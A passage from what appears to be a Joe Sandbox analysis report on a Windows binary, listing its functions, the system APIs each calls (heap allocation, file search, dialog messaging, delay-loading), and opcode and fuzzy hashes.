                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 6e44ec08d5401f84b8a993405b89033dfc4e210f3883211645088b36b45314a2
                                                            • Instruction ID: 647c745f68039b1ecec242bd324ad668837d90d0d15ff1f7c1aea60c051ecce0
                                                            • Opcode Fuzzy Hash: 6e44ec08d5401f84b8a993405b89033dfc4e210f3883211645088b36b45314a2
                                                            • Instruction Fuzzy Hash: 1801C833900DA9ABCF11ABA9CC819DEB776BF98750F014115F912B7152DB34CD04C7A0
                                                            Function 0020C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0020B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020B177
                                                            • _free.LIBCMT ref: 0020C4E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction ID: 051440472a1f6f4ab809a7fbeafbccbc495cca29fea6e13a79bd92cc4eace7dc
                                                            • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                            • Instruction Fuzzy Hash: 0501F9B22103066BE7318F65D88596AFBEDFB85370F35061DE594832C2EA30A905CB74
                                                            Function 0020B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020B177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: d81ed348cd17c4e83496a4756d22eb3734426c70ae06e865f16b1f1f405eb4a3
                                                            • Instruction ID: ee242f6e4c87eaf3344e08ef5c2cb57e052a3a03559a9b3760eec9b95fa1a0d0
                                                            • Opcode Fuzzy Hash: d81ed348cd17c4e83496a4756d22eb3734426c70ae06e865f16b1f1f405eb4a3
                                                            • Instruction Fuzzy Hash: 7FF0B432635326A7DB365E32AC19B9FB748AF41B60B188211BC1C961D3CB60DD2186E4
                                                            Function 00203C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00203C3F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 28a477daa520b36c238446017aa1245529a2bca0983d262aa0378bea509b8f36
                                                            • Instruction ID: a7f35daf6a189868ad23cfcce5bb040d39c5d1532ba9284f088d81f68ae60607
                                                            • Opcode Fuzzy Hash: 28a477daa520b36c238446017aa1245529a2bca0983d262aa0378bea509b8f36
                                                            • Instruction Fuzzy Hash: 99F08C362203179FEF11CEA9EC04A9A77ADAF15B617144126FA05E61D1DB31DA70CB90
                                                            Function 00208E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ca93fcfad1d657afb180f8dabcc6044105d4cb07fa6b3be9907e9d30644380b8
                                                            • Instruction ID: f187887ebcc39335258ab4fcafaafcdd9b7d34c16c613e2b9dfd826ac574706b
                                                            • Opcode Fuzzy Hash: ca93fcfad1d657afb180f8dabcc6044105d4cb07fa6b3be9907e9d30644380b8
                                                            • Instruction Fuzzy Hash: F7E0ED3123232657EB712E22EC08B9B76989B423B0F110121BC88960C3CF60CC2086E9
                                                            Function 001E5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E5AC2
                                                              • Part of subcall function 001EB505: __EH_prolog.LIBCMT ref: 001EB50A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 686ca911b482d5f4b6d3a3922aa0e1dffb1691eef1d57642338077a443609745
                                                            • Instruction ID: 77f8f685f9810425d541df331db35e929f72850f69b470ec90b2d1f2e7635b4d
                                                            • Opcode Fuzzy Hash: 686ca911b482d5f4b6d3a3922aa0e1dffb1691eef1d57642338077a443609745
                                                            • Instruction Fuzzy Hash: 80018C308106D8DAD726E7B8C0517EEFBE49F78304F54848DA55693383CBB41B08D7A2
                                                            Function 001EA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6C4
                                                              • Part of subcall function 001EA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6F2
                                                              • Part of subcall function 001EA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001EA592,000000FF,?,?), ref: 001EA6FE
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            • Opcode ID: 3215447bccdb3b26de22553d13b6d863e51b60118dbd2bb6d327b392cf4ab78e
                                                            • Instruction ID: 38e8870473858229aebdcb6aca6797dd60c9dc956ce1933dfcb4e5a4a8c2740e
                                                            • Opcode Fuzzy Hash: 3215447bccdb3b26de22553d13b6d863e51b60118dbd2bb6d327b392cf4ab78e
                                                            • Instruction Fuzzy Hash: 3BF08231008BD0AACB2257B58904BCFBBD06F2A331F548B49F1FD62196C37560949B23
                                                            Function 001F0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 001F0E3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            • Opcode ID: 8949cb0a982df3604e2b4d1931fc56a9c92ff4c6c9feba7db7145bc181e821f5
                                                            • Instruction ID: f22e8fd30dcf07f72efd0c7ff5326998d134e4923931c8b6be97678827b01316
                                                            • Opcode Fuzzy Hash: 8949cb0a982df3604e2b4d1931fc56a9c92ff4c6c9feba7db7145bc181e821f5
                                                            • Instruction Fuzzy Hash: 4CD0C210A01098EADB223329381DBFE2A068FFA310F0C0065B64957187CF480982A261
                                                            Function 001FA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 001FA62C
                                                              • Part of subcall function 001FA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001FA3DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction ID: b00aac81db7fd7a65c151781ae060d0d9233be5662d48fb48a66cbf8f356256b
                                                            • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                            • Instruction Fuzzy Hash: 91D0A9B020020CBADF026B218C0297E7AAAEF10390F448021BE4AC5191EBB5D910A262
                                                            Function 001FDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,001F1B3E), ref: 001FDD92
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            • Opcode ID: 0415b85aecc97fc82a083eadcfb62529eb83891a236906936eadc813e94f62ab
                                                            • Instruction ID: 812f37217a605eb11ba45bad6b4671fae5c3f759e73980ae7060522004bbf27a
                                                            • Opcode Fuzzy Hash: 0415b85aecc97fc82a083eadcfb62529eb83891a236906936eadc813e94f62ab
                                                            • Instruction Fuzzy Hash: EED09E71148300BBD6126B51DD0AF1A7AE2AB98B04F004554B388740B1C7729D21DB11
                                                            Function 001FE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 001FE5E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            • Opcode ID: 7cec9af7efdfe40a6f7eee0b5a3172bf976233349cd98f012ef7355410fc2ed5
                                                            • Instruction ID: 10cd16df7cd15ce723cb65ccb549dd2c787e94d53073b56c703731d4c2e8a207
                                                            • Opcode Fuzzy Hash: 7cec9af7efdfe40a6f7eee0b5a3172bf976233349cd98f012ef7355410fc2ed5
                                                            • Instruction Fuzzy Hash: 9BD0C9B81D03989AD605FBA8EC8A77436D4B335755F904142B345D64B1DB6444E0CA06
                                                            Function 001E98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,001E97BE), ref: 001E98C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            • Opcode ID: 81210d432d608c88ebecc2831fd07de1ba505a03c03102faf67ccd68db144bc7
                                                            • Instruction ID: 7dda3ba756b6e26e19c936a34be6ccf1ebe52507900e3370ba578c7b7c56a765
                                                            • Opcode Fuzzy Hash: 81210d432d608c88ebecc2831fd07de1ba505a03c03102faf67ccd68db144bc7
                                                            • Instruction Fuzzy Hash: FBC01234404589858E24862698484DD7312AA933657B48694C028850B1C322CC47EA01
                                                            Function 001FE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 2cd8f44a4fdaed7b40d83ee8a3b70ad8ce31327f1e26ebeb4a00cff86cc5daff
                                                            • Instruction ID: 819533bfa59d3282f480874d76d6f9597ff6197929518cc80c294177561d0f64
                                                            • Opcode Fuzzy Hash: 2cd8f44a4fdaed7b40d83ee8a3b70ad8ce31327f1e26ebeb4a00cff86cc5daff
                                                            • Instruction Fuzzy Hash: 60B012D92BC244BD311C71461C52C37028DC0D2F20330843EFD0AD0490D940AC500431
                                                            Function 001FE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6e0068e69aabc0682b9c47883513d185595b5e9ba446ce2b0d1b58bfa26a823e
                                                            • Instruction ID: baea975cbd65be732ebafd819668143574fa81f6c9ef81509c45ef0777553c55
                                                            • Opcode Fuzzy Hash: 6e0068e69aabc0682b9c47883513d185595b5e9ba446ce2b0d1b58bfa26a823e
                                                            • Instruction Fuzzy Hash: 36B012D62BC144BC321CB6061C02C3702CDC0D2B20330C03EFD0EC0190D940AC540431
                                                            Function 001FE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 398dcd11dbb59651621c3e431f2030519428b0b343f4dbe5510f754dfdb6eeb7
                                                            • Instruction ID: 6ab0466f5ee2e96f630f542fa91165a72697f8717644b7551aa91dfef74ae92a
                                                            • Opcode Fuzzy Hash: 398dcd11dbb59651621c3e431f2030519428b0b343f4dbe5510f754dfdb6eeb7
                                                            • Instruction Fuzzy Hash: 57B012D92BC208BD311CB14A1C42C3702CDC0D1F20330403EF90EC0090D9406C500531
                                                            Function 001FE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b44e1abbaac4d1a001db02f0125d90363152c09d96a0daf54ed8c286ed9fb444
